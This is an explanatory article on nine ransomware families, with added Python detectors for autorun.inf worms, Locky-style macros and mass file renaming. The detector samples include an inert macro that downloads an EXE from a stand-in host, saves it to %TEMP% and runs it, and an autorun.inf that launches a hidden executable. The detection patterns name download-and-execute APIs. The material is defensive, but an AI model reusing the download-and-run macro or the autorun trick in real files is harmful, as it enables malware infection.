Ensuring cybersecurity gets harder every year as cybercriminals find new vulnerabilities and launch new attacks constantly. Cybersecurity is an increasingly important issue for businesses: the financial and reputational cost of a data breach creates significant headaches for company owners.
One of the most dangerous forms of cybercrime is enterprise ransomware, which has made headlines repeatedly in recent years. Ransomware has been a prominent threat to enterprises, SMBs, and individuals alike since the mid-2000s. It is malware that infiltrates a computer system and encrypts files so the victim can no longer access them. To unlock the files, the victim must pay the attackers.
There is no guarantee that the attackers will restore access even after the ransom is paid, which is why cybersecurity experts advise ransomware victims not to satisfy the attackers’ demands.
Let’s look at some of the most notable ransomware examples and the damage they did.
1) Bad Rabbit
Bad Rabbit is ransomware that infects a computer and restricts user access to the infected machine until a ransom is paid. Bad Rabbit spread via drive-by downloads from compromised websites: in most cases, visitors were tricked into running the malware by a fake alert that their Adobe Flash Player required an important update. Unlike an exploit-based drive-by, the victim had to download and run the fake installer themselves; once inside a network, Bad Rabbit also tried to spread to other machines over SMB using a list of hardcoded credentials and credentials harvested from the infected host.
Once the victim’s computer is infected and the data encrypted, the ransomware reboots the machine and displays a message titled “Oops! Your files have been encrypted” after the reboot.
When Bad Rabbit was first found in the wild in October 2017, it mainly targeted users in Russia; attacks were also reported in Ukraine, Turkey, and Germany.
2) GoldenEye
GoldenEye is a combination of the Petya and Mischa ransomware families. Unlike most ransomware, GoldenEye uses two layers of encryption: one that encrypts individual files on the computer and another that encrypts the NTFS structures (the master file table). Encrypting the file table prevents victims from booting the machine into a live OS environment to retrieve stored data or samples.
Like Petya, GoldenEye encrypts the disk’s file table and denies the user access to the computer. Unlike the original Petya, however, there is no known workaround for recovering the decryption key from the infected disk: the weakness in early Petya versions that let researchers reconstruct the key was fixed.
After the encryption process completes, the ransomware runs a routine that forcibly crashes the computer to trigger a reboot, leaving the machine unusable until the $300 ransom is paid. Companies and government institutions were among the affected entities.
3) Jigsaw
Jigsaw is a notorious crypto-ransomware that encrypts the victim’s files with the AES cipher. It was designed to spread through malicious attachments in spam emails; once the user runs the downloaded program, it encrypts the user’s files.
The ransom is the equivalent of $150, payable in Bitcoin within 24 hours of infection. The ransom window shows a 60-minute countdown to the next file deletion: Jigsaw deletes one file at first, and the number of files deleted grows after each hour that elapses. If the victim restarts the computer or re-executes the ransomware, it deletes a further 1,000 files. According to the ransom note, all files will be deleted within 72 hours.
A free decryptor exists for Jigsaw: Demonslay335 (Michael Gillespie) released a tool that decrypts files encrypted by the Jigsaw ransomware, so there is no need to pay. Jigsaw is the exception rather than the rule, however. For most ransomware families the files cannot be restored without the attackers’ private key, in which case you should restore your system and files from a backup.
4) ZCryptor
ZCryptor targets Windows and exhibits worm-like behaviour: it copies itself, including to removable drives (USB sticks, flash drives, SD cards). Initial attack vectors include spam email campaigns, macro malware, and fake Adobe Flash installers.
Once a computer is infected, ZCryptor drops an autorun.inf file on removable drives so that it can infect the computers those drives are plugged into. Microsoft researchers explain that the malware also uses network drives to propagate, drops copies of itself in several locations, and sets the hidden attribute on those copies so they do not show up in File Explorer.
Once the files are encrypted, a ransom note demands 1.2 bitcoin (around $500 at the time) for the decryption key. The victim has four days to pay, after which the price rises to 5 bitcoin (around $2,200).
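The autorun.inf that ZCryptor writes to removable media is a plain INI file, so checking a drive for one is a few lines of parsing. The block below is an added example, not code from the original article or from Microsoft’s analysis: it parses the `[autorun]` section and flags the directives that would launch a program (`open=`, `shellexecute=`, `shell\<verb>\command=`). Both autorun.inf texts are constructed for illustration; the file name `system.exe` and the icon trick are typical of USB worms in general, not a claim about ZCryptor’s exact file.

```python
"""Parse an autorun.inf file and flag directives that would launch a program
from the drive, the trick ZCryptor and earlier USB worms relied on.

Added example; not code from the original article.  The autorun.inf texts
below are constructed for illustration and do not reproduce a real malware file.
"""
import re
from typing import Dict, List

# Keys Windows evaluates when AutoRun is honoured.  open= and shellexecute=
# launch a program directly; shell\<verb>\command= adds a context-menu verb
# that runs one (worms usually hijack the default "open" verb).
EXEC_KEYS = {"open", "shellexecute"}
SHELL_CMD_RE = re.compile(r"^shell\\[^\\]+\\command$", re.IGNORECASE)
EXEC_EXT_RE = re.compile(r"\.(exe|scr|com|pif|bat|cmd|vbs|js)\b", re.IGNORECASE)


def parse_autorun_inf(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [autorun] section, keys lower-cased.

    Windows only reads the [autorun] section, so other sections are ignored
    here as well.  Lines starting with ';' are comments.
    """
    values: Dict[str, str] = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = line.split("=", 1)
            values[key.strip().lower()] = value.strip()
    return values


def suspicious_autorun(text: str) -> List[str]:
    """Return one finding per execution-related directive; [] means benign."""
    findings: List[str] = []
    for key, value in parse_autorun_inf(text).items():
        if key in EXEC_KEYS or SHELL_CMD_RE.match(key):
            findings.append(f"{key} launches '{value}'")
            if EXEC_EXT_RE.search(value):
                findings.append(f"{key} target has an executable extension")
    return findings


# Constructed sample in the style of USB worms: a hidden system.exe in the
# drive root, launched by open= and by the default context-menu verb, while
# icon= and action= make the drive look like an ordinary folder.
SAMPLE_AUTORUN = """; constructed sample, not a real malware file
[autorun]
open=\\system.exe
shell\\open\\command=\\system.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
action=Open folder to view files
"""

# Constructed benign file: an icon and a label only, nothing is launched.
BENIGN_AUTORUN = """[autorun]
icon=photos.ico
label=Holiday photos
"""

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, suspicious_autorun(text) or "no execution directives")
```

Two caveats when using this on real drives. Windows 7 and later (and XP/Vista after update KB971029) no longer honour autorun.inf on USB media, only on optical discs, so an autorun.inf with `open=` on a stick is evidence that an infected host wrote it rather than a guaranteed infection path for the next machine. And because ZCryptor hides its copies with the hidden file attribute, a drive check should also list hidden executables in the drive root, not just parse the INI file.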
5) Petya
Petya is a ransomware family that infects Microsoft Windows computers. Like other ransomware it encrypts data on infected systems, but it does so by overwriting the master boot record with a payload that encrypts the hard drive’s file system table (the NTFS master file table) and prevents Windows from booting.
The ransomware takes over the computer and demands $300, paid in Bitcoin. The original Petya variants, first seen in March 2016, propagated via infected email attachments. The June 2017 variant commonly called NotPetya spread rapidly across an organization once a single computer was infected: it used the EternalBlue exploit against the SMBv1 vulnerability that Microsoft had patched in MS17-010, and if that failed it fell back to two legitimate Windows administration tools, PsExec and WMIC, using credentials harvested from the infected machine. The malware tries one option and, if it doesn’t work, moves on to the next.
6) GandCrab
GandCrab is ransomware-as-a-service malware that encrypts victims’ files and demands a ransom payment to restore access to the data. It targets consumers and businesses running Microsoft Windows.
GandCrab is distributed via spam emails, exploit kits and affiliated malware campaigns. Bitdefender and Europol announced a decryptor for GandCrab that handles the latest versions of the ransomware; you can download it and follow the steps described in Bitdefender’s article to decrypt files affected by GandCrab.
7) SamSam
SamSam is malware used in targeted intrusions against organizations, including some in critical infrastructure. The attackers break into vulnerable, internet-facing Windows servers to gain persistent access to the victim’s network, then escalate to administrator rights and deploy the malware to servers only once they have gathered enough information; as a result, the intrusion usually goes unnoticed until encryption starts.
Once the attack begins, the malware encrypts documents and files on every system it can reach on the network. It is at this point that the malware becomes ransomware. The note demands 0.8 bitcoin for the decryption key; running the decryptor on the affected PC recovers the encrypted files.
8) Locky
Locky is ransomware that encrypts important files on your computer and demands a fee to decrypt them. It is distributed via malicious document files attached to spam email messages.
When you open the attached document, it shows garbled text with the prompt “Enable macro if data encoding is incorrect.” If you do so, the macro runs code that downloads the Locky executable, saves it to your system and starts encrypting files, including Office documents, videos and images. To get your files back, the ransom note tells you to install the Tor browser and visit the attackers’ site, where you receive instructions for paying 0.5 bitcoin.
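The Locky lure depends on a macro that fires as soon as the document opens, fetches an executable over HTTP, drops it in a user-writable folder and runs it. The block below is an added example, not code from the original article or from any Locky sample: it scores VBA source text against those four indicators plus cheap obfuscation. The macro text it scans is constructed and inert (the URL uses the reserved `.invalid` TLD and nothing is executed), and the regexes are heuristics chosen for this illustration.

```python
"""Heuristic triage of VBA macro source for the download-and-run pattern that
Locky's spam attachments used (auto-executing procedure, HTTP fetch, drop to
%TEMP%, Shell).

Added example, not code from the original article.  The macro text below is a
constructed, inert illustration: it is only scanned, never executed.
"""
import re
from typing import Dict, List

# Procedures Office runs without further interaction once macros are enabled.
AUTO_EXEC_RE = re.compile(
    r"\b(AutoOpen|Auto_Open|AutoExec|Document_Open|Workbook_Open)\b", re.IGNORECASE)
# Objects and APIs a macro uses to pull a payload off the network.
DOWNLOAD_RE = re.compile(
    r"(URLDownloadToFile|MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|"
    r"InternetExplorer\.Application|ADODB\.Stream)", re.IGNORECASE)
# Ways to run what was downloaded.
EXECUTE_RE = re.compile(
    r"\b(Shell|ShellExecute|WScript\.Shell|Win32_Process|CreateObject)\b", re.IGNORECASE)
# Writing into the user-writable locations droppers favour.
TEMP_RE = re.compile(r'(Environ\(\s*"TEMP"\s*\)|%TEMP%|\\AppData\\)', re.IGNORECASE)
# Cheap obfuscation common in Locky-era macros.
OBFUSC_RE = re.compile(r"(Chr\(\d+\)\s*&\s*Chr\(|StrReverse\(|Xor\s+\d+)", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)


def score_vba(src: str) -> Dict[str, object]:
    """Classify macro source as 'likely downloader', 'suspicious' or 'benign'.

    The full chain (auto-exec + download + execute) is the downloader verdict;
    any two indicators are enough to pull the file aside for a human look.
    """
    indicators = {
        "auto_exec": bool(AUTO_EXEC_RE.search(src)),
        "download": bool(DOWNLOAD_RE.search(src)),
        "execute": bool(EXECUTE_RE.search(src)),
        "temp_path": bool(TEMP_RE.search(src)),
        "obfuscation": bool(OBFUSC_RE.search(src)),
    }
    urls: List[str] = URL_RE.findall(src)
    if indicators["auto_exec"] and indicators["download"] and indicators["execute"]:
        verdict = "likely downloader"
    elif sum(indicators.values()) >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"indicators": indicators, "urls": urls, "verdict": verdict}


# Constructed downloader macro in the Locky style: runs on open, fetches an
# EXE with XMLHTTP, writes it to %TEMP% through ADODB.Stream and launches it.
SAMPLE_MACRO = r'''
' constructed sample for illustration; inert and never executed
Sub AutoOpen()
    Dim target As String
    target = Environ("TEMP") & "\payload.exe"
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "http://example.invalid/8/7.exe", False
    http.Send
    Dim stream As Object
    Set stream = CreateObject("ADODB.Stream")
    stream.Open
    stream.Type = 1
    stream.Write http.responseBody
    stream.SaveToFile target, 2
    Shell target, vbHide
End Sub
'''

# Constructed benign macro: formats a worksheet, touches nothing outside Excel.
BENIGN_MACRO = '''
Sub FormatReport()
    ActiveSheet.Range("A1:D1").Font.Bold = True
    ActiveSheet.Columns("A:D").AutoFit
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, score_vba(src))
```

In practice you would extract the VBA source from the .doc/.docm with a tool such as olevba from the oletools project and feed it to `score_vba`. Real Locky macros were obfuscated, so the `obfuscation` indicator and the "suspicious" verdict matter as much as the full chain. The more robust control is to stop the macro from running at all by blocking macros in documents that arrived from the internet, which removes the user’s ability to click through the "Enable macro" lure.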
9) Cerber
Cerber is ransomware sold under a ransomware-as-a-service (RaaS) model: affiliates purchase and spread the malware, and the developers take a commission on the ransoms it collects. Once installed on a PC, it creates a randomly named executable under %AppData%.
As soon as it executes, Cerber first checks which country the victim is in, based on the system’s locale settings. If the infected computer is in Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine or Uzbekistan, it terminates itself and encrypts nothing. Otherwise it scans all drives for files to encrypt.
For victims in any other country, Cerber appends the .cerber extension to every file it encrypts. After encrypting the victim’s files, it drops a ransom note demanding 1.24 BTC for the decryption key.
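The one behaviour every family on this page shares, whether it appends .cerber, .locky or something never seen before, is a single process renaming a large number of files to one new extension in a short time. The block below is an added example, not code from the original article or from any vendor product: a sliding-window detector over file rename events that alerts on a known extension immediately and on any extension once the rate crosses a threshold. The `FileEvent` records, host names, process names and the 20-renames-per-60-seconds threshold are all constructed assumptions for the illustration; in a real deployment the events would come from Sysmon, auditd or EDR telemetry and the threshold would be tuned to the environment.

```python
"""Rate-based detection of a process renaming many files to one new extension,
the on-disk footprint of Cerber (.cerber), Locky (.locky) and most other
crypto-ransomware, generalised so an unknown extension is caught by rate alone.

Added example, not code from the original article.  FileEvent records are
constructed here; in practice they come from Sysmon, auditd or EDR telemetry.
"""
import os
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, Iterable, List, Set, Tuple

# Extensions named in this article: a single rename to one of these is enough.
KNOWN_RANSOM_EXTS = {".cerber", ".locky"}


@dataclass(frozen=True)
class FileEvent:
    ts: float        # seconds since an arbitrary epoch
    host: str
    process: str     # image name of the process doing the rename
    old_path: str
    new_path: str


def _ext(path: str) -> str:
    return os.path.splitext(path)[1].lower()


def detect_mass_rename(events: Iterable[FileEvent], window: float = 60.0,
                       threshold: int = 20) -> List[Dict[str, object]]:
    """Emit one alert per (host, process, new extension).

    An alert fires when `threshold` renames that change the extension to the
    same new value happen within `window` seconds, or on the first rename to
    a known ransomware extension.
    """
    recent: Dict[Tuple[str, str, str], Deque[float]] = defaultdict(deque)
    alerted: Set[Tuple[str, str, str]] = set()
    alerts: List[Dict[str, object]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        new_ext = _ext(ev.new_path)
        if not new_ext or new_ext == _ext(ev.old_path):
            continue                      # plain move or rename, extension kept
        key = (ev.host, ev.process, new_ext)
        if key in alerted:
            continue                      # one alert per offender
        q = recent[key]
        q.append(ev.ts)
        while q and ev.ts - q[0] > window:
            q.popleft()                   # slide the window forward
        if new_ext in KNOWN_RANSOM_EXTS:
            reason = "known ransomware extension"
        elif len(q) >= threshold:
            reason = "mass rename"
        else:
            continue
        alerts.append({"host": ev.host, "process": ev.process, "new_ext": new_ext,
                       "reason": reason, "count": len(q), "ts": ev.ts})
        alerted.add(key)
    return alerts


def build_sample_events() -> List[FileEvent]:
    """Constructed telemetry: one encryptor with an unknown extension, one
    process using a known extension, a benign rename and a plain move."""
    events = [FileEvent(float(i), "ws01", "rnd5f2a.exe",
                        f"docs/report{i}.docx", f"docs/report{i}.docx.crypt")
              for i in range(25)]
    events.append(FileEvent(5.0, "ws01", "explorer.exe", "notes.txt", "notes.md"))
    events.append(FileEvent(30.0, "ws02", "unknown.exe", "photo.jpg", "photo.jpg.locky"))
    events.append(FileEvent(31.0, "ws02", "unknown.exe", "cv.pdf", "cv.pdf.locky"))
    events.append(FileEvent(40.0, "ws01", "winword.exe", "a.docx", "archive/a.docx"))
    return events


if __name__ == "__main__":
    for alert in detect_mass_rename(build_sample_events()):
        print(alert)
```

The known-extension list is the brittle part: Locky alone later switched to .zepto and .odin, and Cerber moved to random extensions in later versions, which is why the rate rule carries the detection and the list only shortens time-to-alert for the families you already know. Keying on (host, process) rather than host alone keeps a backup agent or a bulk converter that legitimately rewrites many files from masking a concurrent encryptor, and gives the responder the process to kill.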